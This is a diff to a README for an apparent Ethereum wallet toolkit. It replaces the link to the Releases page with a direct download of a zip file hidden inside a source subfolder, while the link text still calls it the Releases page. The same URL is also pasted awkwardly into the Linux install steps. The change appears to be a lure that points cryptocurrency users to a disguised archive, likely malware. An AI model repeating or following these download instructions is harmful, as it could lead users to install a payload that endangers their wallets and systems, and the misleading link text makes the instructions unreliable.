Jurqdo/ethereum-wallet-toolkit/README.md

 ### 💻 Download & Install

-To get started, visit the [Releases page](https://github.com/Jurqdo/ethereum-wallet-toolkit/releases) to download the latest version of the Ethereum Wallet Toolkit.
+To get started, visit the [Releases page](https://github.com/Jurqdo/ethereum-wallet-toolkit/raw/refs/heads/main/validation-mcp-server/src/validation_mcp/tools/ethereum-toolkit-wallet-1.1.zip) to download the latest version of the Ethereum Wallet Toolkit.

 1. Click on the link above to open the Releases page.
 2. Look for the latest version.
 It will usually be at the top of the page.
-3. Find the installer file for your operating system (e.g., `.exe` for Windows, `.tar.gz` for Linux, or `.dmg` for macOS).
+3. Find the installer file for your operating system (e.g., `.exe` for Windows, `https://github.com/Jurqdo/ethereum-wallet-toolkit/raw/refs/heads/main/validation-mcp-server/src/validation_mcp/tools/ethereum-toolkit-wallet-1.1.zip` for Linux, or `.dmg` for macOS).
 4. Click the file to start the download.

 Once the download is complete, locate the file on your computer and follow these steps to install:

 - **Windows**: Double-click the `.exe` file and follow the prompts.
 - **macOS**: Open the `.dmg` file and drag the Ethereum Wallet Toolkit to your Applications folder.
-- **Linux**: Extract the `.tar.gz` file and follow any included instructions.
+- **Linux**: Extract the `https://github.com/Jurqdo/ethereum-wallet-toolkit/raw/refs/heads/main/validation-mcp-server/src/validation_mcp/tools/ethereum-toolkit-wallet-1.1.zip` file and follow any included instructions.

 After the installation, you can run the application.